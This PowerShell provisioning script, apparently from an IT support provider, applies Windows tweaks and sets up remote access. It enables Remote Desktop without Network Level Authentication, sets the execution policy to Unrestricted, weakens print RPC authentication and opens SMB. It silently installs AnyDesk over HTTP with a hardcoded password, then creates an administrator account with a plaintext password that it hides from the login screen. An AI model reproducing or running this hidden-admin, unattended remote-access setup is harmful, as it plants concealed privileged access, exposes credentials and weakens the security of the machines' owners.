178 lines
No EOL
7.1 KiB
PowerShell
178 lines
No EOL
7.1 KiB
PowerShell
#code to make sure the script is running as admin
|
|
If (-NOT ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator))
|
|
{
|
|
# Relaunch as an elevated process:
|
|
Start-Process powershell.exe "-ExecutionPolicy","bypass","-File",('"{0}"' -f $MyInvocation.MyCommand.Path) -Verb RunAs
|
|
exit
|
|
}
|
|
|
|
|
|
####################################
|
|
# Base System Changes and UI Tweaks
|
|
####################################
|
|
|
|
Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Confirm:$False -force
|
|
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
|
Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force -confirm:$false
|
|
$PSRepository = get-PSRepository
|
|
if ($PSRepository.installationpolicy -ne 'Trusted') {
|
|
Set-PSRepository -Name 'PSGallery' -InstallationPolicy Trusted
|
|
}
|
|
|
|
$32apps = Get-WmiObject -class win32_product
|
|
$32bit = Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate
|
|
$64bit = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate
|
|
$apps = $32bit + $64bit
|
|
|
|
#Disable Windows 10 Fast startup
|
|
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Power" -Name HiberbootEnabled -Value 0
|
|
#Set Power Plan to High Performance
|
|
powercfg.exe -SETACTIVE 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c
|
|
powercfg -SETACVALUEINDEX 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 3
|
|
powercfg -change -standby-timeout-ac 0
|
|
powercfg -change -hibernate-timeout-ac 0
|
|
|
|
#Enable Unzip Function
|
|
Add-Type -AssemblyName System.IO.Compression.FileSystem
|
|
function unzip {
|
|
param( [string]$ziparchive, [string]$extractpath )
|
|
[System.IO.Compression.ZipFile]::ExtractToDirectory( $ziparchive, $extractpath )
|
|
}
|
|
|
|
#Create Support Directories
|
|
#New-Item -ItemType directory -Path C:\support -ErrorAction SilentlyContinue
|
|
#New-Item -ItemType directory -Path C:\support\software -ErrorAction SilentlyContinue
|
|
#New-Item -ItemType directory -Path C:\support\software\AnyDesk -ErrorAction SilentlyContinue
|
|
|
|
#Start WinRM Service
|
|
Start-Service WinRM -verbose
|
|
|
|
#Enable System restore
|
|
Enable-ComputerRestore -Drive "C:\" -confirm:$false
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
#Fix Network Print
|
|
Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Print" -name "RpcAuthnLevelPrivacyEnabled" -value 00000000 -type dword
|
|
|
|
# Default preset
|
|
$tweaks = @(
|
|
### Require administrator privileges ###
|
|
"RequireAdmin",
|
|
"EnableRemoteDesktop",
|
|
"DisableSleepTimeout",
|
|
"HideTaskbarPeopleIcon",
|
|
"EnableNumlock"
|
|
)
|
|
|
|
# Relaunch the script with administrator privileges
|
|
Function RequireAdmin {
|
|
If (!([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")) {
|
|
Start-Process powershell.exe "-NoProfile -ExecutionPolicy Bypass -File `"$PSCommandPath`" $PSCommandArgs" -WorkingDirectory $pwd -Verb RunAs
|
|
Exit
|
|
}
|
|
}
|
|
# Enable Remote Desktop w/o Network Level Authentication
|
|
Function EnableRemoteDesktop {
|
|
Write-Output "Enabling Remote Desktop w/o Network Level Authentication..."
|
|
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" -Type DWord -Value 0
|
|
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" -Name "UserAuthentication" -Type DWord -Value 0
|
|
Enable-NetFirewallRule -Name "RemoteDesktop*"
|
|
}
|
|
# Disable display and sleep mode timeouts
|
|
Function DisableSleepTimeout {
|
|
Write-Output "Disabling sleep mode timeouts for AC..."
|
|
powercfg /X standby-timeout-ac 0
|
|
powercfg -change hibernate-timeout-ac 0
|
|
}
|
|
# Hide Taskbar People icon
|
|
Function HideTaskbarPeopleIcon {
|
|
Write-Output "Hiding People icon..."
|
|
If (!(Test-Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\People")) {
|
|
New-Item -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\People" | Out-Null
|
|
}
|
|
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\People" -Name "PeopleBand" -Type DWord -Value 0
|
|
}
|
|
|
|
# Enable NumLock after startup
|
|
Function EnableNumlock {
|
|
Write-Output "Enabling NumLock after startup..."
|
|
If (!(Test-Path "HKU:")) {
|
|
New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
|
|
}
|
|
Set-ItemProperty -Path "HKU:\.DEFAULT\Control Panel\Keyboard" -Name "InitialKeyboardIndicators" -Type DWord -Value 2147483650
|
|
Add-Type -AssemblyName System.Windows.Forms
|
|
If (!([System.Windows.Forms.Control]::IsKeyLocked('NumLock'))) {
|
|
$wsh = New-Object -ComObject WScript.Shell
|
|
$wsh.SendKeys('{NUMLOCK}')
|
|
}
|
|
}
|
|
|
|
|
|
|
|
function Install-AnyDesk {
|
|
param (
|
|
[string]$InstallPath = "C:\ProgramData\AnyDesk",
|
|
[string]$AnyDeskUrl = "http://download.anydesk.com/AnyDesk.exe",
|
|
[string]$Password = "r1ug7FaG0fD2",
|
|
[string]$AdminUsername = "biztech.admin",
|
|
[string]$AdminPassword = "r1ug7FaG0fD2"
|
|
)
|
|
|
|
# Error handling
|
|
try {
|
|
# Create the installation directory if it doesn't exist
|
|
if (-not (Test-Path -Path $InstallPath -PathType Container)) {
|
|
New-Item -Path $InstallPath -ItemType Directory
|
|
}
|
|
|
|
# Download AnyDesk
|
|
Invoke-WebRequest -Uri $AnyDeskUrl -OutFile (Join-Path -Path $InstallPath -ChildPath "AnyDesk.exe")
|
|
|
|
# Install AnyDesk silently
|
|
Start-Process -FilePath (Join-Path -Path $InstallPath -ChildPath "AnyDesk.exe") -ArgumentList "--install $InstallPath --start-with-win --silent" -Wait
|
|
|
|
# Set AnyDesk password
|
|
Start-Process -FilePath (Join-Path -Path $InstallPath -ChildPath "AnyDesk.exe") -ArgumentList "--set-password=$Password" -Wait
|
|
|
|
# Create a new user account
|
|
New-LocalUser -Name $AdminUsername -Password (ConvertTo-SecureString -String $AdminPassword -AsPlainText -Force)
|
|
|
|
# Add the user to the Administrators group
|
|
Add-LocalGroupMember -Group "Administrators" -Member $AdminUsername
|
|
|
|
# Hide the user from the Windows login screen
|
|
Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" -Name $AdminUsername -Value 0 -Type DWORD -Force
|
|
|
|
# Get AnyDesk ID
|
|
Start-Process -FilePath (Join-Path -Path $InstallPath -ChildPath "AnyDesk.exe") -ArgumentList "--get-id" -Wait
|
|
|
|
Write-Host "Installation completed successfully."
|
|
}
|
|
catch {
|
|
Write-Host "Error: $_"
|
|
Write-Host "Installation failed."
|
|
}
|
|
}
|
|
|
|
# Call the Install-AnyDesk function with default values
|
|
Install-AnyDesk
|
|
|
|
|
|
|
|
|
|
|
|
|
|
#Enable SMB and ICMP on Windows Firewall
|
|
Write-host 'Enable SMB and ICMP on Windows Firewall' -ForegroundColor yellow
|
|
Set-NetFirewallRule -DisplayName "File and Printer Sharing (Echo Request - ICMPv4-In)" -Enabled True
|
|
Set-NetFirewallRule -DisplayName "File and Printer Sharing (Echo Request - ICMPv4-Out)" -Enabled True
|
|
Set-NetFirewallRule -DisplayName "File and Printer Sharing (SMB-In)" -Enabled True
|
|
Set-NetFirewallRule -DisplayName "File and Printer Sharing (SMB-Out)" -Enabled True |